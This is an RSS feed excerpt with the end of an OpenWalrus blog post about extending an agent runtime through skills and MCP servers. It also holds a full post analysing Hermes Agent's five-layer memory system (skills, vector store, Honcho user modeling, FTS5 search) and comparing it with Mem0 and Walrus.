conversations. MCP servers can register new entity types at runtime.&lt;br&gt;
The community writes them. Users mix and match them. The repo doesn't grow.&lt;/p&gt;

&lt;p&gt;This is the Unix philosophy applied to agent runtimes. Small tools that&lt;br&gt;
compose, not monolithic systems that configure.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three layers of extension
&lt;/h2&gt;

&lt;p&gt;The "small core, open surface" idea plays out in a consistent&lt;br&gt;
three-layer model across every walrus subsystem — tools, memory, and&lt;br&gt;
entity types all follow the same pattern.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 1 — Framework built-ins.&lt;/strong&gt; The things only the core can provide.&lt;br&gt;
A filesystem tool, a shell tool, an HTTP client, four memory tools&lt;br&gt;
(&lt;code&gt;remember&lt;/code&gt;, &lt;code&gt;recall&lt;/code&gt;, &lt;code&gt;relate&lt;/code&gt;, &lt;code&gt;forget&lt;/code&gt;), and three base entity types&lt;br&gt;
(&lt;code&gt;Agent&lt;/code&gt;, &lt;code&gt;User&lt;/code&gt;, &lt;code&gt;Episode&lt;/code&gt;). This is the floor — always available,&lt;br&gt;
always correct.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 2 — Skills.&lt;/strong&gt; Behavioral templates that tell the agent how to&lt;br&gt;
approach a domain. A coding skill declares entity types like &lt;code&gt;File&lt;/code&gt;,&lt;br&gt;
&lt;code&gt;TestFailure&lt;/code&gt;, &lt;code&gt;ArchDecision&lt;/code&gt; and teaches the agent how to extract them.&lt;br&gt;
A research skill declares &lt;code&gt;Paper&lt;/code&gt;, &lt;code&gt;Topic&lt;/code&gt;, &lt;code&gt;Citation&lt;/code&gt;. A DevOps skill&lt;br&gt;
teaches the agent to compose &lt;code&gt;kubectl&lt;/code&gt; and &lt;code&gt;terraform&lt;/code&gt; commands. Skills&lt;br&gt;
are a few hundred lines of behavioral description, not compiled code.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 3 — MCP servers.&lt;/strong&gt; External capabilities connected at runtime.&lt;br&gt;
A Jira MCP registers &lt;code&gt;Ticket&lt;/code&gt;, &lt;code&gt;Sprint&lt;/code&gt;, &lt;code&gt;Epic&lt;/code&gt; as first-class entities.&lt;br&gt;
A GitHub MCP adds &lt;code&gt;PR&lt;/code&gt;, &lt;code&gt;Issue&lt;/code&gt;, &lt;code&gt;Commit&lt;/code&gt;. The agent's capability surface&lt;br&gt;
grows without any framework changes.&lt;/p&gt;

&lt;p&gt;Every subsystem follows this pattern. Memory isn't special. Tools aren't&lt;br&gt;
special. Entity types aren't special. The extension model is the same&lt;br&gt;
everywhere — which means learning it once is enough.&lt;/p&gt;

&lt;h2&gt;
  
  
  Memory: the first test of the principle
&lt;/h2&gt;

&lt;p&gt;Memory was where we first applied "less code, more skills" — and where&lt;br&gt;
the principle proved itself.&lt;/p&gt;

&lt;p&gt;Our &lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;survey of existing memory systems&lt;/a&gt;&lt;br&gt;
showed every product building a comprehensive memory subsystem. Claude Code&lt;br&gt;
with markdown files and auto-memory. OpenClaw with SQLite + vectors and&lt;br&gt;
hybrid search. ChatGPT with a proprietary backend. Each is a bet on one&lt;br&gt;
particular memory layout being right for most users.&lt;/p&gt;

&lt;p&gt;Instead of building a universal memory framework with config files and&lt;br&gt;
journal directories, we collapsed everything into a single layer: a&lt;br&gt;
&lt;a href="https://openwalrus.xyz/blog/graph-vector-hybrid-memory" rel="noopener noreferrer"&gt;temporal knowledge graph&lt;/a&gt; backed by&lt;br&gt;
LanceDB + lance-graph. Agent identity, user preferences, conversation&lt;br&gt;
episodes, extracted entities — all graph nodes. Four tools to interact&lt;br&gt;
with it. Skills define &lt;em&gt;what&lt;/em&gt; to extract; the core handles &lt;em&gt;how&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;The memory schema grows with the agent's capability surface. Install a&lt;br&gt;
coding skill and &lt;code&gt;File&lt;/code&gt;, &lt;code&gt;TestFailure&lt;/code&gt; become extractable entity types.&lt;br&gt;
Connect a Jira MCP and &lt;code&gt;Ticket&lt;/code&gt;, &lt;code&gt;Sprint&lt;/code&gt; appear. No framework changes.&lt;br&gt;
No config files. The three-layer extension model does the work.&lt;/p&gt;

&lt;p&gt;Read the full deep-dive in&lt;br&gt;
&lt;a href="https://openwalrus.xyz/blog/graph-vector-hybrid-memory" rel="noopener noreferrer"&gt;Graph + vector: how OpenWalrus agents remember&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Beyond memory
&lt;/h2&gt;

&lt;p&gt;"Less code, more skills" isn't just a memory strategy. It's how we think&lt;br&gt;
about every feature request.&lt;/p&gt;

&lt;p&gt;When someone asks "can walrus browse the web?" — the answer isn't a&lt;br&gt;
built-in browser engine. It's an HTTP tool and a web browsing skill that&lt;br&gt;
knows how to navigate, extract, and summarize.&lt;/p&gt;

&lt;p&gt;When someone asks "can walrus manage my infrastructure?" — the answer&lt;br&gt;
isn't a built-in cloud SDK. It's a shell tool and a DevOps skill that&lt;br&gt;
knows how to compose &lt;code&gt;kubectl&lt;/code&gt;, &lt;code&gt;terraform&lt;/code&gt;, and &lt;code&gt;aws&lt;/code&gt; commands.&lt;/p&gt;

&lt;p&gt;When someone asks "can walrus do X?" — the answer is almost always:&lt;br&gt;
the tools already exist, we just need a skill.&lt;/p&gt;

&lt;p&gt;This keeps the repo compact. Every skill is a few hundred lines of&lt;br&gt;
behavioral description, not thousands of lines of compiled code. The&lt;br&gt;
core stays auditable. The binary stays small. And the ecosystem of what&lt;br&gt;
walrus can do grows without bound — because the community builds it,&lt;br&gt;
not us.&lt;/p&gt;

&lt;h2&gt;
  
  
  The tradeoff
&lt;/h2&gt;

&lt;p&gt;This isn't free. Pushing intelligence to skills means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;The core tools have to be excellent.&lt;/strong&gt; If the built-in tools are
unreliable, no skill can compensate. This is where our engineering
effort goes — making the foundational layer rock-solid.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Quality varies.&lt;/strong&gt; Community skills won't all be good. Some will be
brilliant, most will be adequate, a few will be wrong. Curation and
testing matter.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Discovery is harder.&lt;/strong&gt; Users need to find the right skill for their
use case. This is a community infrastructure problem we haven't fully
solved yet.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Skills need good documentation.&lt;/strong&gt; A skill is only as useful as
its instructions are clear. Bad behavioral descriptions produce bad
agent behavior — garbage in, garbage out.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;But the alternative — baking every capability into the framework — is&lt;br&gt;
worse. It makes the repo unmaintainable, the binary bloated, and the&lt;br&gt;
system prompt overloaded. We'd rather have a small, correct core and a&lt;br&gt;
messy ecosystem than a bloated, fragile framework and no ecosystem at all.&lt;/p&gt;

&lt;h2&gt;
  
  
  Stop injecting, start enabling
&lt;/h2&gt;

&lt;p&gt;The system prompt was never meant to be a database. It was meant to be&lt;br&gt;
a brief set of instructions — who you are, how you behave, what tools&lt;br&gt;
you have. The moment we started using it as a persistence layer, we&lt;br&gt;
created a problem that no amount of engineering can solve.&lt;/p&gt;

&lt;p&gt;The fix isn't more framework code. It's better tools and shareable skills.&lt;/p&gt;

&lt;p&gt;Keep the core compact. Keep the surface open. Let agents and communities&lt;br&gt;
build the intelligence. Less code, more skills.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://openwalrus.xyz/docs/walrus/getting-started/installation" rel="noopener noreferrer"&gt;Get started with OpenWalrus →&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>architecture</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Hermes memory: five layers, one learning loop</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:51:22 +0000</pubDate>
      <link>https://forem.com/crabtalk/hermes-memory-five-layers-one-learning-loop-39gd</link>
      <guid>https://forem.com/crabtalk/hermes-memory-five-layers-one-learning-loop-39gd</guid>
      <description>&lt;p&gt;Hermes Agent remembers by doing. Complete a complex task, and it writes a SKILL.md — a step-by-step recipe it can retrieve next time. Ask it something personal, and Honcho derives a Theory of Mind snapshot from the conversation. Search for last week's work, and FTS5 pulls it from a SQLite index. Five memory layers, each solving a different temporal problem. No other open-source agent runtime attempts this much.&lt;/p&gt;

&lt;p&gt;We examined &lt;a href="https://github.com/NousResearch/hermes-agent" rel="noopener noreferrer"&gt;Hermes Agent&lt;/a&gt;'s memory architecture in depth — not the models or the terminal backends (we covered those in the &lt;a href="https://openwalrus.xyz/blog/hermes-agent-survey" rel="noopener noreferrer"&gt;runtime survey&lt;/a&gt;), but the memory system specifically. How the five layers interact, what each one costs, and what's missing.&lt;/p&gt;

&lt;h2&gt;
  
  
  Five layers, explained
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Layer 1: Short-term inference memory
&lt;/h3&gt;

&lt;p&gt;The context window. Every agent has this — it's the transformer's working memory for the current session. Hermes compresses at 50% context utilization (configurable) and caps tool orchestration at 90 iteration steps by default.&lt;/p&gt;

&lt;p&gt;Nothing survives a restart. This layer exists to be lost.&lt;/p&gt;

&lt;h3&gt;
  
  
  Layer 2: Procedural skill documents
&lt;/h3&gt;

&lt;p&gt;This is what makes Hermes's memory unique. When the agent completes a complex task — debugging a microservice, optimizing a pipeline — it autonomously writes a SKILL.md file capturing the step-by-step solution.&lt;/p&gt;

&lt;p&gt;The format follows the &lt;a href="https://agentskills.io/specification" rel="noopener noreferrer"&gt;agentskills.io&lt;/a&gt; standard:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Frontmatter&lt;/strong&gt;: &lt;code&gt;name&lt;/code&gt; (1-64 chars, lowercase + hyphens), &lt;code&gt;description&lt;/code&gt; (1-1024 chars), optional &lt;code&gt;license&lt;/code&gt;, &lt;code&gt;compatibility&lt;/code&gt;, &lt;code&gt;allowed-tools&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Directory structure&lt;/strong&gt;: &lt;code&gt;SKILL.md&lt;/code&gt; plus optional &lt;code&gt;scripts/&lt;/code&gt;, &lt;code&gt;references/&lt;/code&gt;, &lt;code&gt;assets/&lt;/code&gt; subdirectories&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Progressive disclosure&lt;/strong&gt;: metadata loaded always (~100 tokens), full SKILL.md loaded on activation (under 5,000 tokens recommended), resources loaded on-demand&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The creation trigger is the least documented part. It appears to be complexity-based — some heuristic of iteration count, tool calls, or solution novelty. The threshold isn't public, which makes it hard to predict when the agent will create a skill and when it won't.&lt;/p&gt;

&lt;p&gt;Skills are stored locally at &lt;code&gt;~/.hermes/memories/skills/&lt;/code&gt;. They're plain files — inspectable, editable, portable. The agentskills.io standard means skills created in Hermes can theoretically work in 11+ other tools that adopt the spec.&lt;/p&gt;

&lt;h3&gt;
  
  
  Layer 3: Contextual persistence
&lt;/h3&gt;

&lt;p&gt;A vector store indexes skill documents for workflow retrieval. When a new task resembles a past task, the system retrieves the relevant skill and uses it as a starting scaffold.&lt;/p&gt;

&lt;p&gt;This is where layers 2 and 3 interact: layer 2 creates skills, layer 3 makes them findable. Without contextual persistence, the agent would have to know which skill to load by name. With it, the agent describes the task, and the closest matching skill surfaces.&lt;/p&gt;

&lt;h3&gt;
  
  
  Layer 4: User modeling via Honcho
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://honcho.dev/" rel="noopener noreferrer"&gt;Honcho&lt;/a&gt; is an external service from &lt;a href="https://github.com/plastic-labs/honcho" rel="noopener noreferrer"&gt;Plastic Labs&lt;/a&gt; that models users through what they call "dialectical reasoning." It doesn't store conversations — it derives conclusions from them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The data model&lt;/strong&gt; is peer-centric with four primitives:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Primitive&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;th&gt;Scope&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Workspace&lt;/td&gt;
&lt;td&gt;Multi-tenant isolation&lt;/td&gt;
&lt;td&gt;Top-level container&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Peer&lt;/td&gt;
&lt;td&gt;Entity representation&lt;/td&gt;
&lt;td&gt;Both users and agents&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Session&lt;/td&gt;
&lt;td&gt;Interaction thread&lt;/td&gt;
&lt;td&gt;Temporal boundary&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Message&lt;/td&gt;
&lt;td&gt;Atomic data unit&lt;/td&gt;
&lt;td&gt;Conversations, events, documents&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The key insight is that both users and agents are "peers" — this enables multi-participant reasoning, not just one-way user profiling.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it reasons&lt;/strong&gt;: Custom reasoning models process messages asynchronously in the background, deriving Representations — Theory of Mind snapshots about each peer. These aren't raw transcripts. They're conclusions: "User has 10+ years Rust experience," "User prefers async communication," "User is working on a migration project."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How agents query it&lt;/strong&gt;: Three retrieval methods:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;get_context()&lt;/code&gt;&lt;/strong&gt; — returns a combination of messages, conclusions, and summaries up to a token budget. ~200ms latency.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;search()&lt;/code&gt;&lt;/strong&gt; — hybrid text + semantic search across workspace, peer, or session scope.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dialectic chat&lt;/strong&gt; — natural language queries to Honcho. The agent asks "What does this user care about?" and gets a reasoned answer, not a database row.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Configuration&lt;/strong&gt;: enabled via &lt;code&gt;user_profile_enabled: true&lt;/code&gt; and a &lt;code&gt;HONCHO_API_KEY&lt;/code&gt; in &lt;code&gt;~/.hermes/config.yaml&lt;/code&gt;. This is the only layer that requires an external service.&lt;/p&gt;

&lt;h3&gt;
  
  
  Layer 5: Full-text search (FTS5)
&lt;/h3&gt;

&lt;p&gt;SQLite FTS5 indexes all past interactions with LLM-powered summarization. Not raw logs — the system summarizes sessions before indexing, reducing noise and context pollution.&lt;/p&gt;

&lt;p&gt;This layer answers temporal queries: "What did I do last Tuesday?" "What was the error I hit in the auth service last week?" Cross-session recall that the context window can't provide and that skill documents don't capture (skills are procedural, not episodic).&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/hermes-memory-system" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Every layer feeds back into the context window. The closed loop: tasks produce skills, skills improve future tasks, Honcho builds an evolving user model, FTS5 provides temporal recall. Each session is supposed to make the next one better.&lt;/p&gt;

&lt;h2&gt;
  
  
  The closed learning loop
&lt;/h2&gt;

&lt;p&gt;The theory is compelling. An agent that gets better over time:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Agent completes a task → writes SKILL.md&lt;/li&gt;
&lt;li&gt;Next similar task → vector store retrieves the skill → agent starts from a scaffold instead of zero&lt;/li&gt;
&lt;li&gt;Honcho observes the user → derives preferences → future sessions are personalized&lt;/li&gt;
&lt;li&gt;FTS5 indexes everything → temporal recall available across sessions&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The question is whether this compounds in practice. We found no published benchmarks measuring skill reuse rates, user model accuracy over time, or degradation curves. The loop is well-designed in theory — the evidence gap is how it performs after months of heavy use.&lt;/p&gt;

&lt;h2&gt;
  
  
  Honcho: the user modeling question
&lt;/h2&gt;

&lt;p&gt;Honcho's approach is fundamentally different from both &lt;a href="https://openwalrus.xyz/blog/mem0-memory-architecture" rel="noopener noreferrer"&gt;Mem0's scope-based model&lt;/a&gt; and walrus's graph-based model.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mem0&lt;/strong&gt; organizes memory by scope (conversation, session, user) and uses an LLM extraction pipeline to decide what goes where. The intelligence is in the extraction.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Walrus&lt;/strong&gt; uses a single graph (LanceDB + lance-graph) with typed entities and explicit agent tools. The intelligence is in the agent — it decides what to remember.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Honcho&lt;/strong&gt; derives conclusions from conversations without storing them. The intelligence is in the reasoning model that produces Representations. It doesn't store "user said they prefer TypeScript in message #47." It stores "user prefers TypeScript" as a derived fact.&lt;/p&gt;

&lt;p&gt;This is closer to how humans remember — we forget the conversation, remember the conclusion. The risk is the same as with human memory: the conclusion might be wrong, and you can't go back to the source to verify.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does it work?&lt;/strong&gt; Honcho &lt;a href="https://docs.honcho.to/" rel="noopener noreferrer"&gt;claims&lt;/a&gt; improved personalization and context-awareness. &lt;a href="https://blog.plasticlabs.ai/blog/Honcho-3" rel="noopener noreferrer"&gt;Honcho 3.0&lt;/a&gt; added faster context retrieval and smarter embedding reuse. But we found no published A/B tests or benchmarks comparing agent performance with and without Honcho enabled. The contribution of user modeling to actual task completion is an open empirical question.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
The radar shows Hermes dominating on procedural memory and user modeling — the two capabilities that distinguish it from every other system. The gap on forgetting/decay is the most striking: Hermes scores 1 out of 10. It has no mechanism to forget.&lt;/p&gt;
&lt;h2&gt;
  
  
  Skill lifecycle: creation, retrieval, decay
&lt;/h2&gt;

&lt;p&gt;Skills are Hermes's most original contribution. But the lifecycle has gaps.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Creation&lt;/strong&gt;: autonomous, triggered by complexity heuristics. The threshold is undocumented — this makes it unpredictable. An agent might create a skill for a trivial task or miss a complex one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Retrieval&lt;/strong&gt;: vector similarity via the contextual persistence layer. The right skill surfaces for similar tasks. This works well when skill names and descriptions are distinctive. It works less well when skills overlap (three skills for "deploy to staging" created at different times with slightly different approaches).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What's missing&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Deduplication&lt;/strong&gt;: No mechanism to detect that two skills solve the same problem. Mem0 uses cosine similarity (0.85 threshold) to merge near-duplicates. Hermes doesn't.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Versioning&lt;/strong&gt;: No way to track skill evolution. If the agent rewrites a skill, the old version is gone.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Expiration&lt;/strong&gt;: Skills never expire. A skill for "deploy to staging via Jenkins" persists long after you've migrated to GitHub Actions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Conflict detection&lt;/strong&gt;: Two skills with contradictory advice ("always use yarn" vs "always use pnpm") can coexist without any system-level awareness.
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;
Hermes leads on auto-creation and portability (agentskills.io). Mem0 leads on deduplication. Nobody scores well on versioning. The expiration row is telling — Hermes scores 0, meaning skills accumulate indefinitely.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;
  
  
  What's missing: forgetting
&lt;/h2&gt;

&lt;p&gt;None of the five layers have a documented forgetting mechanism.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Skills&lt;/strong&gt; accumulate in &lt;code&gt;~/.hermes/memories/skills/&lt;/code&gt; with no pruning&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FTS5 index&lt;/strong&gt; grows with every session, no summarization decay&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Honcho representations&lt;/strong&gt; persist indefinitely — derived facts are never invalidated&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vector store&lt;/strong&gt; indexes grow with the skill collection&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Contrast this with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Mem0's DELETE operation&lt;/strong&gt; — the extraction pipeline can explicitly remove contradicted memories&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Walrus's compact and distill tools&lt;/strong&gt; — imperfect, but the agent can at least consolidate and prune&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cognitive science&lt;/strong&gt; — Ebbinghaus decay curves suggest unused memories should fade. No agent framework implements this&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The absence of forgetting is a design choice, not an oversight. Hermes bets that more memory is always better than less. This works at small scale. At 10,000+ skills and years of FTS5 logs, the signal-to-noise ratio is an open question. We explored the broader patterns of memory growth in our survey of &lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;persistent agent memory&lt;/a&gt;, and the &lt;a href="https://openwalrus.xyz/blog/context-compaction" rel="noopener noreferrer"&gt;context compaction survey&lt;/a&gt; covers how frameworks handle the related overflow problem.&lt;/p&gt;
&lt;h2&gt;
  
  
  Infrastructure cost
&lt;/h2&gt;

&lt;p&gt;Hermes's memory is cheaper to run than it looks. Three of five layers are local:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Runs locally&lt;/th&gt;
&lt;th&gt;External service&lt;/th&gt;
&lt;th&gt;LLM calls&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Context window&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;0 per op&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Skills (SKILL.md)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;1 (creation only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Contextual (vector)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;0 per op&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Honcho (user model)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Honcho API&lt;/td&gt;
&lt;td&gt;1+ per session&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;FTS5 (search)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;0 per query&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Configuration lives in &lt;code&gt;~/.hermes/config.yaml&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;memory_enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;user_profile_enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;    &lt;span class="c1"&gt;# requires HONCHO_API_KEY&lt;/span&gt;
  &lt;span class="na"&gt;memory_char_limit&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;2200&lt;/span&gt;       &lt;span class="c1"&gt;# ~800 tokens for MEMORY.md&lt;/span&gt;
  &lt;span class="na"&gt;user_char_limit&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1375&lt;/span&gt;         &lt;span class="c1"&gt;# ~500 tokens for USER.md&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each layer is independently disableable. You can run Hermes with just skills and FTS5 (fully local, no external services) or add Honcho for user modeling. The &lt;code&gt;skip_memory&lt;/code&gt; parameter in the &lt;code&gt;AIAgent()&lt;/code&gt; constructor disables persistence entirely.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
The cost profile is bimodal: four layers are effectively free (local files, local SQLite), one layer (Honcho) requires an external service with LLM calls. FTS5 has the highest storage growth because it indexes every session.&lt;/p&gt;

&lt;h2&gt;
  
  
  How it compares
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Hermes Agent&lt;/th&gt;
&lt;th&gt;Mem0&lt;/th&gt;
&lt;th&gt;Walrus&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Memory layers&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;3 scopes&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Procedural memory&lt;/td&gt;
&lt;td&gt;SKILL.md (autonomous)&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;User modeling&lt;/td&gt;
&lt;td&gt;Honcho (dialectical reasoning)&lt;/td&gt;
&lt;td&gt;User scope (LLM extraction)&lt;/td&gt;
&lt;td&gt;Graph entities (agent-driven)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-session recall&lt;/td&gt;
&lt;td&gt;FTS5 + LLM summarization&lt;/td&gt;
&lt;td&gt;Vector similarity retrieval&lt;/td&gt;
&lt;td&gt;Graph traversal + journals&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deduplication&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;LLM-powered (cosine 0.85)&lt;/td&gt;
&lt;td&gt;Upsert by key&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Forgetting&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;DELETE operation&lt;/td&gt;
&lt;td&gt;compact / distill tools&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;External services&lt;/td&gt;
&lt;td&gt;1 (Honcho, optional)&lt;/td&gt;
&lt;td&gt;4 self-hosted / 1 managed&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Skill portability&lt;/td&gt;
&lt;td&gt;agentskills.io (11+ tools)&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LLM calls per write&lt;/td&gt;
&lt;td&gt;1 (skill creation)&lt;/td&gt;
&lt;td&gt;2 (extract + decide)&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  What walrus does differently
&lt;/h2&gt;

&lt;p&gt;Walrus's single layer — LanceDB + lance-graph with six tools (remember, recall, relate, connections, compact, distill) — is a deliberate bet against complexity.&lt;/p&gt;

&lt;p&gt;No skill documents, no user modeling service, no FTS5 index. The agent decides what's worth remembering and writes it to the graph. The agent queries the graph when it needs context. The agent compacts when memory grows.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where Hermes wins&lt;/strong&gt;: procedural memory is genuinely valuable. An agent that writes down how it solved a problem and reuses that solution later is a meaningful capability. Walrus doesn't have this — the agent can &lt;code&gt;remember&lt;/code&gt; facts and &lt;code&gt;relate&lt;/code&gt; entities, but it can't capture a multi-step procedure as a reusable unit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where walrus wins&lt;/strong&gt;: zero external services, zero LLM calls per write, one mental model. When something goes wrong with memory in walrus, you inspect one graph. When something goes wrong in Hermes, you debug across five layers — was the skill created? Was it indexed? Did Honcho derive the right conclusion? Did FTS5 find the right session?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The deeper question&lt;/strong&gt;: is five layers the right number? Could Hermes achieve 90% of the benefit with two layers (skills + FTS5) and skip the vector store, Honcho, and the complexity they add? The answer depends on whether user modeling and contextual persistence produce measurable improvements — and right now, that evidence doesn't exist publicly.&lt;/p&gt;

